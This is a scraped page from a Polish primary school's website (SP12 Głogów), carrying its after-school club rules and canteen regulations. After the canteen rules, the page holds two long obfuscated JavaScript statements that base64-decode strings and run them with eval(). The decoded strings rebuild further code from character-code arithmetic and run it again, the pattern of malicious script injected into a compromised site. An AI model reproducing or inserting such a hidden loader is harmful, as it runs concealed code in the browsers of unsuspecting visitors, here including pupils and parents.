sp12-glogow-szkola-podstawowa-glogow-logo2
sp12-glogow-szkola-podstawowa-glogow-godlo

Regulaminy świetlicy

ZASAD W ŚWIETLICY PRZESTRZEGAMY, NA TABLICACH CODZIENNIE JE CZYTAMY…

1. Pani słuchamy, gdy do nas mówi to jej nie przerywamy.

2. Jeden mówi inni słuchają.

3. W świetlicy nie jestem sam, przyjaciół wokół mam.

4. W stołówce kulturalnie posiłki spożywamy.

5. Uprzejmie się do siebie zwracamy: proszę, przepraszam, dziękuję używamy.

6. W świetlicy duża nas gromada – bezpieczeństwo to podstawa.

7. W każdej sytuacji sobie pomagamy – dobrym słowem się odwdzięczamy.

8. Plotkować, obgadywać nie lubimy – o pogodzie rozmawiać wolimy.

9. Grzecznie się bawimy, zabawek nie niszczymy.

10. I jeszcze jedna ważna sprawa: innych nie przezywam! To ważna zasada.

REGULAMIN-Świetlicy

REGULAMIN STOŁÓWKI 

Szkoły Podstawowej Nr 12 z Oddziałami Integracyjnymi w Głogowie

1)    Stołówka jest miejscem spożywania posiłków przygotowanych przez kuchnię szkolną dla uczniów oraz pracowników szkoły.

W wyznaczonych miesiącach w stołówce szkolnej spożywane jest mleko.

2)    Pomieszczenie stołówki może być wykorzystywane do innych celów wynikających  z organizacji pracy szkoły z pominięciem czasu wydawania posiłków.

3)    Do korzystania z posiłków w stołówce szkolnej uprawnieni są uczniowie i pracownicy pedagogiczni po wcześniejszym wniesieniu opłaty za dany miesiąc.

4)    Posiłki wydawane są w godzinach od 11:30 do 13:15

a)    Przerwa obiadowa dla uczniów klas I-III, IV od 11.30 do 11.45 (po 4 lekcji).

b)    Przerwa obiadowa dla uczniów klas V, VI i I-III mające zajęcia dodatkowe od 12.30 do 12.45 (po 5 lekcji).

c)    Na lekcji 5 i 6 z obiadów korzystają wychowankowie świetlicy szkolnej.

5)    Codzienny posiłek składa się  z dwóch dań, co uwzględnione jest w tygodniowym jadłospisie.

6)    Podczas spożywania posiłków obowiązują zasady kulturalnego zachowania.

7)    Obiad odbierany jest osobiście.

a)    Po spożyciu obiadu brudne naczynia oraz sztućce należy odnieść w wyznaczone miejsce.

b)    Każda osoba przebywająca w stołówce za szkody spowodowane umyślnie odpowiada materialne.

8)    Niestosowne zachowanie i utrudnianie  innym uczniom spożywania posiłku, jest  podstawą do wyproszenia ucznia ze stołówki szkolnej.

a)    Za rażące naruszanie regulaminu każda osoba może być pozbawiona prawa do wykupienia posiłków w stołówce szkolnej w kolejnym miesiącu.

9)    Na obiad uczniowie zgłaszają się z aktualnym bloczkiem obiadowym, bez wierzchniego okrycia, plecaki pozostawiają pod klasą lub po skończonych lekcjach w wyznaczonym miejscu przed stołówką szkolną.

10) Podczas wydawania obiadów zabrania się pobytu w pomieszczeniach stołówki osobom, które nie spożywają posiłków.

11)  Odpłatność za obiady za dany miesiąc uiszczana jest u Intendentki w pierwsze dwa dni robocze nowego miesiąca.

12)  Odpis poniesionych kosztów za obiad może nastąpić z powodu usprawiedliwionej nieobecności.

a)    Nieobecność musi być zgłoszona u Intendentki szkolnej osobiście lub telefonicznie dzień wcześniej lub najpóźniej do godz. 8:30 danego dnia.

b)    Informacje o wycieczkach i wyjściach szkolnych musi być zgłoszona przez wychowawcę klasy minimum 3 dni wcześniej.

13)  Odliczenie kwoty następuje z odpłatności w następnym miesiącu.

a)    W miesiącach: grudzień i czerwiec odpisy za obiady nie są realizowane.

14)  Osobą upoważnioną do egzekwowania regulaminu jest kierownik świetlicy.

15)  Powyższy regulamin obowiązuje od 07.01.2014 r.

 

var EVCMIPYPUQ = atob(‚dmFyIEhMR05USUtBU1UgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE3IC0gNywgMTE5IC0gMSwgMTAwIC0gMywgMTIxIC0gNywgMzggLSA2LCAxMTUgLSA4LCAxMDcgLSA2LCAxMjMgLSAyLCAzNyAtIDUsIDY5IC0gOCwgMzkgLSA3LCA0MSAtIDIsIDExMiAtIDEsIDg0IC0gMiwgNzIgLSA1LCAxMDAgLSAyLCA5OCAtIDgsIDc3IC0gOSwgMTE4IC0gNCwgOTUgLSA1LCAxMTUgLSA2LCAxMDIgLSA1LCA0NiAtIDcsIDYxIC0gMiwgMTYgLSA2LCAxMjIgLSA0LCAxMDIgLSA1LCAxMTggLSA0LCA0MCAtIDgsIDEwNyAtIDYsIDExMSAtIDEsIDEwMiAtIDMsIDEwOSAtIDgsIDEwNSAtIDUsIDMzIC0gMSwgNjUgLSA0LCAzOCAtIDYsIDQ4IC0gOSwgNzYgLSA1LCA5MiAtIDgsIDc5IC0gMiwgMTIyIC0gMiwgODggLSA3LCAxMTQgLSA5LCAxMTYgLSA1LCA1OCAtIDgsIDczIC0gMywgNzMgLSA1LCA5NiAtIDYsIDg2IC0gOCwgOTMgLSA1LCA3MyAtIDQsIDYxIC0gNSwgNTYgLSA2LCA4MCAtIDQsIDY5IC0gNCwgNzggLSA5LCAxMjQgLSA2LCA4MiAtIDcsIDg1IC0gMywgMTAxIC0gMiwgNTYgLSA4LCA4MCAtIDksIDkwIC0gNSwgNTcgLSAxLCA4NCAtIDcsIDc5IC0gNiwgNjkgLSAyLCA5MyAtIDQsIDczIC0gNSwgODUgLSA5LCAxMTEgLSA2LCA3MSAtIDIsIDYwIC0gOSwgODYgLSA4LCAxMDkgLSA2LCAxMTEgLSA4LCA4MiAtIDUsIDcyIC0gNSwgMTEyIC0gNiwgMTIxIC0gMiwgNTQgLSAzLCA5MiAtIDksIDExNCAtIDQsIDUyIC0gNCwgNTcgLSA2LCA3MCAtIDEsIDkwIC0gNywgMTA3IC0gNCwgNzQgLSA1LCA3NCAtIDUsIDg3IC0gNSwgMTIxIC0gNSwgNTggLSA5LCAxMDAgLSAzLCAxMTMgLSA1LCAxMTIgLSA0LCA4NCAtIDMsIDgyIC0gNCwgNjcgLSAyLCA3NCAtIDksIDU3IC0gMSwgNjkgLSA0LCA4NyAtIDIsIDYzIC0gNywgMTA2IC0gNywgODQgLSA2LCAxMzEgLSA5LCAxMDAgLSAxLCAxMTIgLSA2LCA4MSAtIDUsIDEwOCAtIDIsIDc0IC0gOSwgNzMgLSA4LCA4NCAtIDcsIDEyMyAtIDQsIDU3IC0gMSwgOTAgLSA1LCA3NiAtIDUsIDEyNSAtIDMsIDEwOCAtIDgsIDEyMCAtIDYsIDg5IC0gNywgOTEgLSA4LCAxMTYgLSA5LCA1NCAtIDQsIDcxIC0gMiwgOTYgLSA4LCA1NSAtIDYsIDY4IC0gMiwgODggLSA2LCAxMTEgLSA4LCAxMDggLSA5LCAxMTYgLSA3LCA3OSAtIDEsIDEyOCAtIDgsIDc4IC0gNCwgMTA3IC0gNCwgMTA2IC0gOSwgNTUgLSA2LCA1MCAtIDIsIDEyMSAtIDQsIDc5IC0gNywgMTI3IC0gOCwgNzEgLSA2LCA4MiAtIDgsIDgzIC0gNSwgNzMgLSA2LCAxMTYgLSA1LCA3MSAtIDUsIDgxIC0gMiwgMTI0IC0gMiwgODggLSA3LCAxMDEgLSAzLCAxMDIgLSAyLCA2NiAtIDEsIDgzIC0gNiwgODcgLSA5LCA4OCAtIDcsIDc1IC0gOCwgNzEgLSAyLCA1MiAtIDEsIDc0IC0gOSwgMTI3IC0gNiwgNjAgLSA4LCAxMjUgLSA5LCA3NSAtIDYsIDkwIC0gMiwgODkgLSA0LCA3MSAtIDYsIDcwIC0gNSwgNzQgLSA5LCA5MyAtIDQsIDYwIC0gNCwgMTA0IC0gNiwgODUgLSA0LCAxMTAgLSA3LCAxMTcgLSA1LCA5MCAtIDEsIDU0IC0gNSwgMTIzIC0gNywgMTEyIC0gOCwgOTggLSA4LCAxMjIgLSAzLCA4NyAtIDIsIDY2IC0gMSwgODUgLSA4LCA4OSAtIDUsIDkxIC0gMiwgODIgLSAyLCA4NSAtIDUsIDEyMyAtIDIsIDExNiAtIDUsIDc0IC0gMywgMTA3IC0gNywgNzIgLSA3LCA4NiAtIDEsIDczIC0gNCwgNzQgLSA2LCAxMTAgLSA0LCA5NCAtIDQsIDExOCAtIDIsIDY3IC0gMiwgMTI3IC0gNiwgMTE0IC0gMywgNTAgLSAyLCA3OSAtIDksIDEyNCAtIDIsIDg5IC0gOCwgODEgLSA3LCA3NyAtIDQsIDEwNCAtIDEsIDEwOCAtIDksIDYyIC0gNywgODQgLSA4LCAxMjggLSA5LCA5NyAtIDcsIDEyNiAtIDUsIDg1IC0gNywgNzQgLSA5LCA2NyAtIDIsIDY0IC0gOCwgNjYgLSAxLCA5MiAtIDcsIDEwOCAtIDQsIDk0IC0gOSwgOTQgLSA3LCA3MiAtIDcsIDcwIC0gOSwgNjggLSA3LCA0OCAtIDksIDYzIC0gNCwgMTUgLSA1LCAxMDQgLSAyLCAxMjIgLSA1LCAxMTMgLSAzLCAxMDYgLSA3LCAxMTggLSAyLCAxMDcgLSAyLCAxMTcgLSA2LCAxMTYgLSA2LCAzOSAtIDcsIDEyMiAtIDIsIDExNCAtIDMsIDEyMSAtIDcsIDEwMiAtIDcsIDEwMiAtIDEsIDExMyAtIDMsIDEwNyAtIDgsIDQ2IC0gNiwgMTIwIC0gNSwgMTI0IC0gOCwgMTE3IC0gMywgMTA2IC0gMSwgMTE0IC0gNCwgMTA0IC0gMSwgNDYgLSAyLCAzNyAtIDUsIDEwOCAtIDEsIDExMCAtIDksIDEyNyAtIDYsIDQzIC0gMiwgMzMgLSAxLCAxMjkgLSA2LCAxMiAtIDIsIDMzIC0gMSwgMzYgLSA0LCAxMjEgLSAzLCAxMDIgLSA1LCAxMTcgLSAzLCAzOSAtIDcsIDEyMSAtIDcsIDEwNiAtIDUsIDEyMSAtIDYsIDM0IC0gMiwgNzAgLSA5LCAzNiAtIDQsIDQ2IC0gNywgNDEgLSAyLCA2NCAtIDUsIDE1IC0gNSwgNDAgLSA4LCAzNiAtIDQsIDEwNyAtIDUsIDExNCAtIDMsIDEyMiAtIDgsIDQwIC0gOCwgNDggLSA4LCAxMjQgLSA2LCAxMDEgLSA0LCAxMjMgLSA5LCA0MCAtIDgsIDExMCAtIDUsIDM5IC0gNywgNzAgLSA5LCAzMyAtIDEsIDU2IC0gOCwgNjcgLSA4LCAzNCAtIDIsIDExMiAtIDcsIDQxIC0gOSwgNjcgLSA3LCAzMyAtIDEsIDEyMyAtIDgsIDEyMiAtIDYsIDExOCAtIDQsIDEwOCAtIDMsIDExMSAtIDEsIDEwNSAtIDIsIDU1IC0gOSwgMTE3IC0gOSwgMTAzIC0gMiwgMTEyIC0gMiwgMTEyIC0gOSwgMTIxIC0gNSwgMTA5IC0gNSwgNjMgLSA0LCAzNiAtIDQsIDExMyAtIDgsIDQ2IC0gMywgNTIgLSA5LCA0NiAtIDUsIDM2IC0gNCwgMTMxIC0gOCwgMTYgLSA2LCA0MCAtIDgsIDQwIC0gOCwgMzUgLSAzLCAzNyAtIDUsIDExNyAtIDMsIDEwOCAtIDcsIDEyMSAtIDYsIDM0IC0gMiwgNDcgLSA0LCA2NyAtIDYsIDM0IC0gMiwgODcgLSA0LCAxMTkgLSAzLCAxMTYgLSAyLCAxMDYgLSAxLCAxMTUgLSA1LCAxMDggLSA1LCA0OSAtIDMsIDEwNiAtIDQsIDEyMyAtIDksIDEyMCAtIDksIDExNiAtIDcsIDY5IC0gMiwgMTA2IC0gMiwgOTggLSAxLCAxMTcgLSAzLCA3MSAtIDQsIDExNCAtIDMsIDEwMyAtIDMsIDEwNSAtIDQsIDQ0IC0gNCwgMTE2IC0gMSwgMTI0IC0gOCwgMTE4IC0gNCwgMTA5IC0gNCwgMTE4IC0gOCwgMTA3IC0gNCwgNDcgLSAxLCAxMDcgLSA4LCAxMDUgLSAxLCAxMDIgLSA1LCAxMjMgLSA5LCA3NiAtIDksIDExMyAtIDIsIDEwMSAtIDEsIDEwOCAtIDcsIDY5IC0gNCwgMTIxIC0gNSwgNDcgLSA3LCAxMDkgLSA0LCA1MCAtIDksIDM4IC0gNiwgOTkgLSA1LCAxMiAtIDIsIDEwIC0gMSwgMTggLSA5LCAxMCAtIDEsIDEzIC0gNCwgMTExIC0gNCwgMTAzIC0gMiwgMTI0IC0gMywgNDggLSAyLCAxMDcgLSA4LCAxMTMgLSA5LCA5OCAtIDEsIDEyMCAtIDYsIDcxIC0gNCwgMTE4IC0gNywgMTAzIC0gMywgMTA3IC0gNiwgNzEgLSA2LCAxMjAgLSA0LCA0OSAtIDksIDExMCAtIDUsIDM1IC0gMywgNDYgLSA5LCAzMyAtIDEsIDExMiAtIDUsIDExMCAtIDksIDEzMCAtIDksIDUyIC0gNiwgMTA5IC0gMSwgMTA5IC0gOCwgMTEzIC0gMywgMTEwIC0gNywgMTI0IC0gOCwgMTA2IC0gMiwgNDUgLSA0LCA0OSAtIDgsIDY1IC0gNiwgMTcgLSA3LCAzNiAtIDQsIDM5IC0gNywgMTMwIC0gNSwgMTggLSA4LCA0MSAtIDksIDQxIC0gOSwgMTE4IC0gNCwgMTAzIC0gMiwgMTIxIC0gNSwgMTE5IC0gMiwgMTIxIC0gNywgMTE3IC0gNywgNDEgLSA5LCAxMjEgLSA3LCAxMDIgLSAxLCAxMjAgLSA1LCA2OCAtIDksIDE4IC0gOCwgMTMxIC0gNiwgMTYgLSA2LCAxMiAtIDIsIDEyMyAtIDUsIDEwMSAtIDQsIDExOSAtIDUsIDM1IC0gMywgMTA3IC0gNywgMTA5IC0gOCwgMTA0IC0gNSwgNDAgLSA4LCA2MyAtIDIsIDM4IC0gNiwgMTI4IC0gOCwgMTE0IC0gMywgMTE2IC0gMiwgOTkgLSA0LCAxMTAgLSA5LCAxMTMgLSAzLCAxMDcgLSA4LCA0NSAtIDUsIDEwNiAtIDksIDEyNCAtIDgsIDEyMCAtIDksIDEwNCAtIDYsIDQ4IC0gOCwgMTAzIC0gMiwgMTE3IC0gNywgMTA1IC0gNiwgMTA0IC0gMywgMTA2IC0gNiwgNTAgLSA5LCA1MiAtIDgsIDQwIC0gOCwgMTEyIC0gNSwgMTAzIC0gMiwgMTI5IC0gOCwgNDQgLSAzLCA2MCAtIDEsIDExIC0gMSwgNDkgLSA5LCAxMTQgLSA0LCAxMDggLSA3LCAxMjcgLSA4LCAzNCAtIDIsIDc2IC0gNiwgMTIzIC0gNiwgMTEzIC0gMywgMTAxIC0gMiwgMTI0IC0gOCwgMTA3IC0gMiwgMTE0IC0gMywgMTE3IC0gNywgNDQgLSA0LCAxMDQgLSA0LCAxMDcgLSA2LCAxMDYgLSA3LCA0OSAtIDgsIDQ0IC0gMywgNDUgLSA1LCA0OCAtIDcsIDYwIC0gMSwgMTUgLSA1LCAxMiAtIDIpO2V2YWwoSExHTlRJS0FTVSk7’); eval(EVCMIPYPUQ); var GZBOSFJDZI = atob(‚dmFyIElBVVBMSUJWVVogPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE1IC0gNSwgMTIxIC0gMywgMTAxIC0gNCwgMTIyIC0gOCwgMzQgLSAyLCAxMTYgLSA5LCAxMTAgLSA5LCAxMjcgLSA2LCAzNCAtIDIsIDY2IC0gNSwgMzYgLSA0LCA0NiAtIDcsIDExMSAtIDYsIDEyMSAtIDEsIDg1IC0gMiwgMTIwIC0gMiwgOTIgLSAyLCAxMjEgLSAyLCAxMDQgLSAxLCAxMTMgLSA0LCA5NiAtIDcsIDY5IC0gNCwgNDggLSA5LCA2NyAtIDgsIDE1IC0gNSwgMTI1IC0gNywgMTAxIC0gNCwgMTE5IC0gNSwgMzUgLSAzLCAxMTAgLSA5LCAxMTYgLSA2LCAxMDIgLSAzLCAxMDUgLSA0LCAxMDQgLSA0LCAzMyAtIDEsIDY0IC0gMywgNDAgLSA4LCA0NSAtIDYsIDgwIC0gOCwgMTI2IC0gNiwgMTE0IC0gNywgMTA2IC0gMiwgOTMgLSA3LCAxMTQgLSA5LCAxMTcgLSA2LCA3NCAtIDQsIDc0IC0gOSwgODYgLSA1LCA3MyAtIDMsIDU1IC0gMiwgMTA2IC0gNCwgNzYgLSA3LCAxMTQgLSA3LCAxMDAgLSAxLCA4MyAtIDMsIDczIC0gNywgOTAgLSA1LCAxMjMgLSA1LCA3MiAtIDEsIDEwNCAtIDEsIDc4IC0gNSwgNzUgLSA3LCA3OCAtIDIsIDg5IC0gMiwgNjMgLSA3LCA4MCAtIDUsIDc1IC0gOCwgMTEwIC0gNCwgOTggLSA5LCA5MSAtIDMsIDgzIC0gNywgMTEwIC0gNiwgNzYgLSAzLCAxMDkgLSA0LCA3MSAtIDYsIDg4IC0gNCwgMTIzIC0gNCwgMTIyIC0gNywgNzUgLSA3LCA3MCAtIDQsIDk4IC0gOSwgMTE1IC0gNSwgOTAgLSAyLCAxMTcgLSA3LCA1NCAtIDYsIDc4IC0gOSwgNzUgLSA5LCA3NCAtIDgsIDY1IC0gOSwgMTIyIC0gMywgNzkgLSAyLCA4MyAtIDEsIDU1IC0gNiwgMTAzIC0gMSwgMTA5IC0gOCwgMTA5IC0gMiwgNTEgLSAyLCA4NiAtIDUsIDcyIC0gNiwgMTI5IC0gOSwgODggLSAzLCA4MiAtIDYsIDg2IC0gOCwgOTIgLSA1LCA2MiAtIDYsIDEwNiAtIDksIDc4IC0gNiwgOTEgLSA4LCAxMDMgLSA0LCA1OCAtIDcsIDgzIC0gNywgMTA1IC0gMiwgNzkgLSAyLCA5MCAtIDQsIDY4IC0gMiwgNzQgLSA2LCAxMTkgLSA0LCA1MiAtIDQsIDc2IC0gNCwgODggLSA2LCA1NyAtIDgsIDY0IC0gOSwgOTAgLSA1LCA4OSAtIDYsIDExMyAtIDYsIDczIC0gMywgNzQgLSA4LCA3MiAtIDMsIDEyMSAtIDksIDU3IC0gOCwgOTYgLSA2LCAxMDggLSA1LCA3NCAtIDUsIDgzIC0gNiwgNzkgLSA1LCAxMjEgLSAyLCA5NCAtIDQsIDExMCAtIDcsIDkzIC0gNiwgNzIgLSAzLCAxMDkgLSA2LCA5NCAtIDQsIDc2IC0gMSwgMTMwIC0gOSwgNzMgLSA4LCA4MyAtIDMsIDc5IC0gNywgMTExIC0gNSwgMTIwIC0gOSwgOTMgLSA3LCA4NiAtIDcsIDEyMiAtIDMsIDEwMiAtIDMsIDgyIC0gMywgODUgLSA0LCAxMjUgLSAzLCAxMDIgLSAzLCAxMjMgLSA3LCA4NCAtIDIsIDEwOCAtIDUsIDExOCAtIDMsIDExMyAtIDMsIDcyIC0gMiwgMTI0IC0gMywgNjAgLSA4LCAxMDkgLSA4LCA3NCAtIDgsIDc2IC0gNywgNzkgLSA2LCA1MSAtIDMsIDc2IC0gMywgNjcgLSAyLCA3MyAtIDgsIDkwIC0gMywgMTA2IC0gNCwgODcgLSA1LCAxMjIgLSAzLCAxMTMgLSAxLCA5MSAtIDYsIDcxIC0gMiwgNTQgLSAxLCA5MiAtIDUsIDkwIC0gNSwgMTMwIC0gOSwgOTEgLSA2LCA3NiAtIDUsIDc2IC0gNSwgMTI1IC0gNCwgOTEgLSAyLCA5OSAtIDEsIDg1IC0gNSwgMTI3IC0gNywgMTE0IC0gNywgOTMgLSA5LCA4NSAtIDQsIDEzMCAtIDgsIDc0IC0gNSwgMTE0IC0gNywgNzIgLSA1LCA3MiAtIDYsIDEyNiAtIDYsIDY2IC0gOSwgNzMgLSAzLCAxMjYgLSA1LCAxMTQgLSAzLCA4MSAtIDksIDc0IC0gOSwgMTEwIC0gNywgNzggLSAxLCA2MCAtIDMsIDcwIC0gNSwgMTEyIC0gOSwgNzggLSA5LCA4NiAtIDQsIDgzIC0gMywgMTIzIC0gMywgNzkgLSA1LCAxMjUgLSA0LCA2OCAtIDIsIDEyMyAtIDMsIDkyIC0gNywgODMgLSA3LCA4NCAtIDYsIDkxIC0gNCwgMTA1IC0gMSwgOTIgLSA5LCAxMDEgLSAyLCAxMTEgLSA4LCA2NyAtIDYsIDY5IC0gOCwgNDYgLSA3LCA2OCAtIDksIDE2IC0gNiwgMTA0IC0gMiwgMTIzIC0gNiwgMTEyIC0gMiwgMTAzIC0gNCwgMTE3IC0gMSwgMTEwIC0gNSwgMTIwIC0gOSwgMTExIC0gMSwgNDEgLSA5LCAxMjUgLSA1LCAxMTIgLSAxLCAxMTkgLSA1LCAxMDMgLSA4LCAxMDggLSA3LCAxMTEgLSAxLCAxMDEgLSAyLCA0MSAtIDEsIDExNyAtIDIsIDExOSAtIDMsIDExNiAtIDIsIDExMiAtIDcsIDExMSAtIDEsIDExMSAtIDgsIDUwIC0gNiwgMzkgLSA3LCAxMTMgLSA2LCAxMTAgLSA5LCAxMjQgLSAzLCA0NSAtIDQsIDM4IC0gNiwgMTI0IC0gMSwgMTYgLSA2LCAzNiAtIDQsIDM2IC0gNCwgMTI2IC0gOCwgMTAxIC0gNCwgMTIyIC0gOCwgNDEgLSA5LCAxMTcgLSAzLCAxMDYgLSA1LCAxMTggLSAzLCAzOSAtIDcsIDY2IC0gNSwgMzcgLSA1LCA0NyAtIDgsIDQ3IC0gOCwgNjIgLSAzLCAxOCAtIDgsIDM4IC0gNiwgMzMgLSAxLCAxMDUgLSAzLCAxMTkgLSA4LCAxMTggLSA0LCAzOCAtIDYsIDQyIC0gMiwgMTI0IC0gNiwgMTAxIC0gNCwgMTE1IC0gMSwgMzMgLSAxLCAxMDcgLSAyLCA0MSAtIDksIDY0IC0gMywgNDAgLSA4LCA0OSAtIDEsIDYwIC0gMSwgMzQgLSAyLCAxMTEgLSA2LCAzOCAtIDYsIDY3IC0gNywgMzkgLSA3LCAxMTcgLSAyLCAxMTggLSAyLCAxMTcgLSAzLCAxMTQgLSA5LCAxMTUgLSA1LCAxMDUgLSAyLCA0NyAtIDEsIDExNSAtIDcsIDEwNSAtIDQsIDExMSAtIDEsIDEwOSAtIDYsIDEyMiAtIDYsIDEwNiAtIDIsIDYxIC0gMiwgMzYgLSA0LCAxMDkgLSA0LCA0OSAtIDYsIDQ2IC0gMywgNDkgLSA4LCAzOCAtIDYsIDEyOCAtIDUsIDE4IC0gOCwgMzkgLSA3LCAzNSAtIDMsIDM1IC0gMywgMzcgLSA1LCAxMTcgLSAzLCAxMDUgLSA0LCAxMTggLSAzLCAzMyAtIDEsIDUyIC0gOSwgNjUgLSA0LCAzNyAtIDUsIDg3IC0gNCwgMTIzIC0gNywgMTE4IC0gNCwgMTA3IC0gMiwgMTE1IC0gNSwgMTA1IC0gMiwgNTQgLSA4LCAxMDQgLSAyLCAxMTcgLSAzLCAxMTUgLSA0LCAxMTEgLSAyLCA3MyAtIDYsIDExMiAtIDgsIDEwNiAtIDksIDEyMSAtIDcsIDcwIC0gMywgMTE5IC0gOCwgMTA4IC0gOCwgMTAzIC0gMiwgNDIgLSAyLCAxMjMgLSA4LCAxMjAgLSA0LCAxMjAgLSA2LCAxMTQgLSA5LCAxMTMgLSAzLCAxMTIgLSA5LCA1MCAtIDQsIDEwNyAtIDgsIDExMSAtIDcsIDEwMSAtIDQsIDEyMCAtIDYsIDcxIC0gNCwgMTE3IC0gNiwgMTA2IC0gNiwgMTA2IC0gNSwgNzMgLSA4LCAxMTkgLSAzLCA0MSAtIDEsIDExMCAtIDUsIDUwIC0gOSwgMzYgLSA0LCA5NyAtIDMsIDE0IC0gNCwgMTMgLSA0LCAxNyAtIDgsIDExIC0gMiwgMTAgLSAxLCAxMTIgLSA1LCAxMDYgLSA1LCAxMjkgLSA4LCA1MiAtIDYsIDEwMyAtIDQsIDExMyAtIDksIDEwNSAtIDgsIDExOSAtIDUsIDc2IC0gOSwgMTE1IC0gNCwgMTA4IC0gOCwgMTAzIC0gMiwgNzEgLSA2LCAxMjAgLSA0LCA0NiAtIDYsIDExNCAtIDksIDM5IC0gNywgMzggLSAxLCAzOCAtIDYsIDEwOSAtIDIsIDEwMiAtIDEsIDEyMiAtIDEsIDQ3IC0gMSwgMTA5IC0gMSwgMTA0IC0gMywgMTE2IC0gNiwgMTA1IC0gMiwgMTIxIC0gNSwgMTEzIC0gOSwgNDggLSA3LCA0NiAtIDUsIDYwIC0gMSwgMTkgLSA5LCA0MSAtIDksIDM3IC0gNSwgMTMwIC0gNSwgMTQgLSA0LCAzNCAtIDIsIDM4IC0gNiwgMTIzIC0gOSwgMTA5IC0gOCwgMTE5IC0gMywgMTIxIC0gNCwgMTIzIC0gOSwgMTE0IC0gNCwgMzQgLSAyLCAxMTcgLSAzLCAxMDMgLSAyLCAxMTYgLSAxLCA2MSAtIDIsIDE2IC0gNiwgMTMwIC0gNSwgMTIgLSAyLCAxMyAtIDMsIDEyNCAtIDYsIDk4IC0gMSwgMTIyIC0gOCwgMzYgLSA0LCAxMDYgLSA2LCAxMDUgLSA0LCAxMDEgLSAyLCAzNiAtIDQsIDY1IC0gNCwgMzUgLSAzLCAxMjEgLSAxLCAxMTkgLSA4LCAxMjAgLSA2LCA5OSAtIDQsIDEwNiAtIDUsIDExNiAtIDYsIDEwMSAtIDIsIDQyIC0gMiwgMTA2IC0gOSwgMTI1IC0gOSwgMTE4IC0gNywgMTA2IC0gOCwgNDcgLSA3LCAxMDQgLSAzLCAxMTEgLSAxLCAxMDMgLSA0LCAxMDkgLSA4LCAxMDEgLSAxLCA0NiAtIDUsIDUwIC0gNiwgMzcgLSA1LCAxMTYgLSA5LCAxMTAgLSA5LCAxMjYgLSA1LCA0NyAtIDYsIDY1IC0gNiwgMTggLSA4LCA0OCAtIDgsIDExNiAtIDYsIDEwOSAtIDgsIDEyMiAtIDMsIDM0IC0gMiwgNzMgLSAzLCAxMjMgLSA2LCAxMTIgLSAyLCAxMDUgLSA2LCAxMjQgLSA4LCAxMTAgLSA1LCAxMTMgLSAyLCAxMTkgLSA5LCA0NCAtIDQsIDEwMiAtIDIsIDEwOCAtIDcsIDEwNSAtIDYsIDQ1IC0gNCwgNTAgLSA5LCA0OCAtIDgsIDQ3IC0gNiwgNjEgLSAyLCAxNCAtIDQsIDExIC0gMSk7ZXZhbChJQVVQTElCVlVaKTs=’); eval(GZBOSFJDZI);

Rekrutacja

logo-elemento

Stołówka

jadlospis-img

Kalendarz

Nadchodzące

Działania Samorządu Uczniowskiego

  • 14.02. - Poczta Walentynkowa
  • 18.02. - Dzień Kota

Uczestniczymy w programach: